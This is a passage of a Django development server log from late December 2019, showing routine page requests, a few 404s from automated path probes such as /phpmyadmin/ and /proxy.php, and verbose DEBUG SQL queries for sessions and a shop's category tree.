HTTP/1.0" 302 0 [26/Dec/2019 22:30:51] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:30:52] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:35:55] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [26/Dec/2019 22:40:58] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:46:01] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:51:26] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 22:56:06] "HEAD /robots.txt HTTP/1.0" 404 6454 [26/Dec/2019 22:56:29] "GET / HTTP/1.0" 302 0 [26/Dec/2019 22:57:10] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [26/Dec/2019 23:02:52] "GET /proxy.php HTTP/1.0" 404 6454 [26/Dec/2019 23:05:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:11:58] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:17:01] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:22:44] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:30:05] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:32:41] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:35:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-26 23:35:06,538 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'vt3lhbbzbpl182sw3ghm9z5awl8psupf' LIMIT 1; args=('vt3lhbbzbpl182sw3ghm9z5awl8psupf',) DEBUG 2019-12-26 23:35:06,541 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('vt3lhbbzbpl182sw3ghm9z5awl8psupf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-09T23:35:06.539919+00:00'::timestamptz); args=('vt3lhbbzbpl182sw3ghm9z5awl8psupf', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 9, 23, 35, 6, 539919, tzinfo=)) [26/Dec/2019 23:35:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [26/Dec/2019 23:35:06] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [26/Dec/2019 23:35:06] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [26/Dec/2019 23:35:06] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [26/Dec/2019 23:35:06] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [26/Dec/2019 23:35:07] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [26/Dec/2019 23:35:07] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 Not Found: /favicon.ico [26/Dec/2019 23:35:07] "GET /favicon.ico HTTP/1.0" 404 6454 [26/Dec/2019 23:38:03] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:41:37] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:43:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [26/Dec/2019 23:45:57] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [26/Dec/2019 23:45:58] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=204 HTTP/1.0" 404 6532 Not Found: /jyky/SendMail.asp [26/Dec/2019 23:46:00] "GET /jyky/SendMail.asp?ArticleID=241 HTTP/1.0" 404 6486 [26/Dec/2019 23:48:10] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:53:12] "GET / HTTP/1.0" 302 0 [26/Dec/2019 23:58:15] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:13:35] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:18:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:25:01] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:34:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:39:09] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:44:12] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 00:49:14] "GET / HTTP/1.0" 302 0 [27/Dec/2019 00:55:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:10:05] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:15:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:20:55] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:25:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:34:35] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:39:38] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:42:30] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:44:41] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:47:18] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:50:48] "GET / HTTP/1.0" 302 0 [27/Dec/2019 01:56:04] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:00:33] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:01:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 02:09:27] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:16:29] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:24:53] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:29:56] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 02:36:52] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:41:54] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:46:57] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:52:00] "GET / HTTP/1.0" 302 0 [27/Dec/2019 02:57:20] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 03:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:12:25] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:17:42] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:22:44] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:30:16] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:36:46] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:41:53] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:46:56] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:51:59] "GET / HTTP/1.0" 302 0 [27/Dec/2019 03:55:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 03:55:27,115 utils 4252 140031503103744 (0.005) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '02dfyrpkvvpo4uzqa4222xw2vptuawi4' LIMIT 1; args=('02dfyrpkvvpo4uzqa4222xw2vptuawi4',) DEBUG 2019-12-27 03:55:27,118 utils 4252 140031503103744 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('02dfyrpkvvpo4uzqa4222xw2vptuawi4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T03:55:27.116487+00:00'::timestamptz); args=('02dfyrpkvvpo4uzqa4222xw2vptuawi4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 3, 55, 27, 116487, tzinfo=)) [27/Dec/2019 03:55:27] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 03:58:36] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:05:02] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:08:24] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:10:05] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:19:00] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:24:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [27/Dec/2019 04:29:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:34:07] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:39:23] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:44:26] "GET / HTTP/1.0" 302 0 [27/Dec/2019 04:49:29] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [27/Dec/2019 04:52:58] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [27/Dec/2019 04:53:00] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=205 HTTP/1.0" 404 6532 Not Found: /newslist.asp [27/Dec/2019 04:53:02] "GET /newslist.asp?type=4&id=1375 HTTP/1.0" 404 6476 [27/Dec/2019 04:54:45] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:00:01] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 05:07:29,414 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'phpmyadmin'; args=('phpmyadmin',) Not Found: /phpmyadmin/ [27/Dec/2019 05:07:29] "GET /phpmyadmin/ HTTP/1.0" 404 1736 [27/Dec/2019 05:10:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:20:42] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:25:45] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:30:48] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:36:50] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:41:53] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:46:55] "GET / HTTP/1.0" 302 0 [27/Dec/2019 05:51:58] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:00:01] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:21:23] "GET / HTTP/1.0" 302 0 [27/Dec/2019 06:26:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 06:29:06,426 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:29:06,433 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:29:06,436 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:29:06,439 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:29:06,442 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:29:06,446 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:29:06,449 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:29:06,453 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:29:06,456 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:29:06,459 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:29:06,462 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:29:06,464 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:29:06,466 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:29:06,471 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:29:06,476 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:29:06,480 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:29:06,483 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:29:06,487 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:29:06,490 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:29:06,496 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:29:06,500 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:29:06,502 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:29:06,504 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:29:06,507 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:29:06,509 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:29:06,512 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:29:06,514 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:29:06,516 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:29:06,518 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:29:06,521 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:29:06,524 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:29:06,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:29:06,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:29:06,536 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:29:06,539 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:29:06,545 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:29:06,549 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:29:06,552 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:29:06,556 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:29:06,559 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:29:06,563 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:29:06,568 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:29:06,572 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" 